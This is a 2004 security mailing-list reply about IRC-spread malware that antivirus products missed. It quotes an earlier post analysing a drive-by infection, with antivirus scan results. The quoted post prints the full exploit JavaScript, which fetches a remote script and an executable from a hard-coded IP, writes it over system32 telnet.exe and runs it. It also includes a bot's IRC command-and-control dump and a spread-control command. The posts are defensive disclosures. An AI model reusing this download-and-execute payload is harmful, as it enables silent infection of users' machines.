<<< Date Index >>>     <<< Thread Index >>>

RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection



Interesting,

I hope this is NOT a trend or new policy.

On friday 4th 13:34 -0300 GMT, I sent to the focus-virus list a message
about a new malware of some sort, that was not being detected by Symantec AV
Corporate (Client Security with 02/06/2004 rev. 17 - now, with defs. from
13/06/2004 rev. 17, still NO detection, no action). The code is named
"d0r1t1s" as it arrived to me.

The message was not "acted upon" and didn't make to the list. I sent the
message to Mr. Mark Fossi on sat 05/06/2004 12:06 -03:00 GMT, received no
reply so far.

back to business.

I was having a discussion earlier this month with a friend about malware not
being detected by major AV vendor products, when he said to me that he had a
code (a rootkit of some sort) that was not being detected by Symantec
products, and that was spreading fast through IRC (IRC is very popular here
in Brazil).

I asked him to send the file in, and it got through Symantec AV for gateways
AND Symantec Client Security. so far, the file (rar packed) is sitting here
at my desktop without being detected by realtime protection or manual /
scheduled scans.

It's even more interesting to see google results:

http://www.google.com/search?hl=en&ie=UTF-8&q=d0r1t1s&btnG=Google+Search

Like I said in my previrous emails, I would sleep better at night if I see
this code analyzed and properly detected. According to my friend, Kaspersky
and McAfee based products are detecting the threat so far.

[from the message he sent to me stating that Kapersky detected it]:

D:\temp\d0r1t1s.rar/d0r1t1s.exe/dorod.exe    Infected    
Backdoor.HacDef.084   
D:\temp\d0r1t1s.rar/d0r1t1s.exe/niamx    Infected    
Worm.Win32.Randon   
D:\temp\d0r1t1s.rar/d0r1t1s.exe/ppi.exe    Infected    
Backdoor.MotivFTP.12   
D:\temp\d0r1t1s.rar/d0r1t1s.exe/redroses    Infected
Backdoor.IRC.Zapchast   
D:\temp\d0r1t1s.rar/d0r1t1s.exe/wexp.exe    Infected    
Exploit.Win32.RPCLsa.01.c   

RAV Antivirus Online file Scan results (as of 14/06/2004 10:00 -03:00 GMT):

d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dir32.exe->(CExe) is infected with
Tool:HideWindows
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dorod.exe->(FSGPE) is infected with
Backdoor:Win32/Hackdef.0_84
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->niamx is suspicious of IRC/Generic*
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->ppi.exe->(UPXW) is infected with
Backdoor:Win32/MotivFTP.1_2
d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->van32.exe->(FSGPE) is infected with
Trojan:Win32/HideWindow

(only the reported infected files shown to keep it readable)

Regards,

Romulo M. cholewa
Home: http://www.rmc.eti.br
News: http://www.rmc.eti.br/news
PGP key id 0x7F8A3B40


 

] -----Original Message-----
] From: Rusty Chiles [mailto:rustychiles@xxxxxxx] 
] Sent: Thursday, June 03, 2004 7:35 PM
] To: bugtraq@xxxxxxxxxxxxxxxxx
] Subject: New IRC Trojan -Symantec and Trend Micro Unable To 
] Stop Infection
] 
] It seems that a new trojan is making the rounds on irc.
] Nobody else seems to have figured it out yet, as there is no 
] antivirus pattern out.
] 
] It seems that things on this list get attention quicker, and 
] my virus case hasn't even been looked at yet from any av 
] vendor. I'd like to post what i've found to speed the process up.
] 
] While on irc, a client posted a link to the following url.
] I was on a fully patched windows xp sp1 box at the time with 
] up to date virus scan. (Symantec AV 2004)
] 
] I click the url, and see a picture, and a mini popup window. 
] Thought it to be strange, but nothing else of it at the time.
] 
] **THIS URL IS NOT SAFE** DO NOT CLICK
] http:-//www.teamwwindy.com/thekiss.jpg
] **THIS URL IS NOT SAFE** DO NOT CLICK
] 
] 
] ** UPDATE ***
] I am seeing this spread from clients posting a new url today 
] as well http:-//www.rvsgroups.com/nfos/DOOM.III-DEViANCE/
] ** DO NOT GO TO THIS URL UNLESS YOU WANT TO BE INFECTED **
] 
] (ps links are broken with - intentionally to prevent infection)
] 
] 
] Symantec on latest pattern detects nothing.
] Trend Micro internet security detects some sort of javacript 
] Exploit; however in this case the payload still infected the 
] machine using trend.
] 
] The web exploit that installs the payload runs this 
] javascript code code --------------snip 
] ----------------snip-------------------snip--------------
] ---------------------------
] function getRealShell() {
]     myiframe.document.write("<SCRIPT
] SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
] }
] 
] document.write("<IFRAME ID=myiframe SRC='about:blank' 
] WIDTH=200 HEIGHT=200></IFRAME>"); setTimeout("getRealShell()",100);
] 
] --------------snip 
] ----------------snip-------------------snip--------------
] ---------------------------
] the file shellscript(1).js file is downloaded shellscript.js 
] is run contains this code
] 
] --------------snip 
] ----------------snip-------------------snip--------------
] ---------------------------
] var downloadurl="http://66.119.180.10:8080/a.exe";;
] 
] if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) 
] savetopath="C:\\WINDOWS\\system32\\telnet.exe";
] if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) 
] savetopath="C:\\WINNT\\system32\\telnet.exe";
] 
] payloadURL = downloadurl;
] var x = new ActiveXObject("Microsoft.XMLHTTP");
] x.Open("GET",payloadURL,0);
] x.Send();
] 
] function bla() { return "A" + "D" + "O" + "D" + "B" + "." + 
] "S" + "t" + "r"
] + "e" + "a" + "m"; }
] 
] var s = new ActiveXObject(bla());
] s.Mode = 3;
] s.Type = 1;
] s.Open();
] s.Write(x.responseBody);
] s.SaveToFile(savetopath,2);
] 
] location.href = "telnet://";
] 
] --------------snip 
] ----------------snip-------------------snip--------------
] ---------------------------
] At this point I see a process telnet.exe is in the task 
] manager. This is the a.exe file that was downloaded by 
] shellscript.js moved to c:\windows\telnet.exe or telnet.bak
] 
] (something to do with windows file protection I believe)
] 
] (note a registry key was also made to rename telnet.bak to 
] telnet.exe on the next boot........ giving you a version of 
] telnet that is actually a
] backdoor) (there is also a runonce reg key made to msmsgr.exe 
] which is also just a copy of the a.exe file that the earlier 
] javascript exploit copied up)
] 
] Now once the payload has executed (a.exe or telnet.exe)
] 
] It connects to this irc server 66-119-180-10.van.zoolink.com:6667
] Here's a sniffer dump of the first few seconds.
] 
] NICK zapvc
] USER zxayd 0 0 :zapvc
] :irc.server NOTICE zapvc :*** If you are having problems 
] connecting due to ping timeouts, please type /quote pong 
] 81863547 or /raw pong 81863547 now.
] PING :81863547
] PONG 81863547
] :IRC!IRC@xxxxxxxxxx PRIVMSG zapvc :VERSION :irc.server 001 
] zapvc :Welcome to the Private IRC Network 
] zapvc!zxayd@xxxxxxxxxxxxxxxxxxxx :irc.server 002 zapvc :Your 
] host is irc.server, running version
] Unreal3.2-beta19
] :irc.server 003 zapvc :This server was created Mon Jan 12 
] 15:18:40 2004 :irc.server 004 zapvc irc.server 
] Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp 
] lvhopsmntikrRcaqOALQbSeKVfMGCuzN :irc.server 005 zapvc MAP 
] KNOCK SAFELIST HCN MAXCHANNELS=5 MAXBANS=60 NICKLEN=30 
] TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are 
] supported by this server :irc.server 005 zapvc WALLCHOPS 
] WATCH=128 SILENCE=5 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ 
] CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=Private 
] CASEMAPPING=ascii :are supported by this server :irc.server 
] 251 zapvc :There are 922 users and 2 invisible on 1 servers 
] :irc.server 254 zapvc 5 :channels formed :irc.server 255 
] zapvc :I have 924 clients and 0 servers :irc.server 265 zapvc 
] :Current Local Users: 924  Max: 1719 :irc.server 266 zapvc 
] :Current Global Users: 924  Max: 926 JOIN #desk :irc.server 
] 422 zapvc :MOTD File is missing USERHOST zapvc JOIN #desk 
] USERHOST zapvc JOIN #desk USERHOST zapvc 
] :zapvc!zxayd@ip68-2-130-81.@mydomain.changed.com JOIN :#desk 
] :irc.server 332 zapvc #desk :.mirc spread stop :irc.server 
] 333 zapvc #desk spn 1087025036 :irc.server 353 zapvc @ #desk 
] :zapvc @spn @_p_ :irc.server 366 zapvc #desk :End of /NAMES list.
] PRIVMSG #desk :
] :irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
] :irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
] :irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
] :irc.server 412 zapvc :No text to send
] 
] If I manually join #desk
] --------------------------------------------------------------
] --------------
] ----------------------
] You are now talking on #desk
] --- Topic for #desk is .mirc spread stop
] --- Topic for #desk set by spn at Sat Jun 12 00:23:56
] 
] From the topic it looks like .mirc spread stop is a remote 
] control command to stop the spread. I am unsure what other 
] commands are available to those who are controlling the trojan.
] 
] It is hikacking the MIRC client of the person infected and 
] using this functionality to spread by messaging clients with 
] the url of the website that the infection occurs from.
] 
] As of this morning the channel #desk is unoccupied. The irc 
] server is still up, no public channels, and a client 
] connection count of about 800.
] 
] I submitted samples to trend micro, and wanted to submit to 
] symantec but their submission process is overly complicated 
] since I no longer had their product installed I couldn't 
] submit samples.
] 
] Abuse departments where the webpage resides, as well as the 
] irc server resides have been contacted, but no action has 
] been taken thus far.
] 
] 
]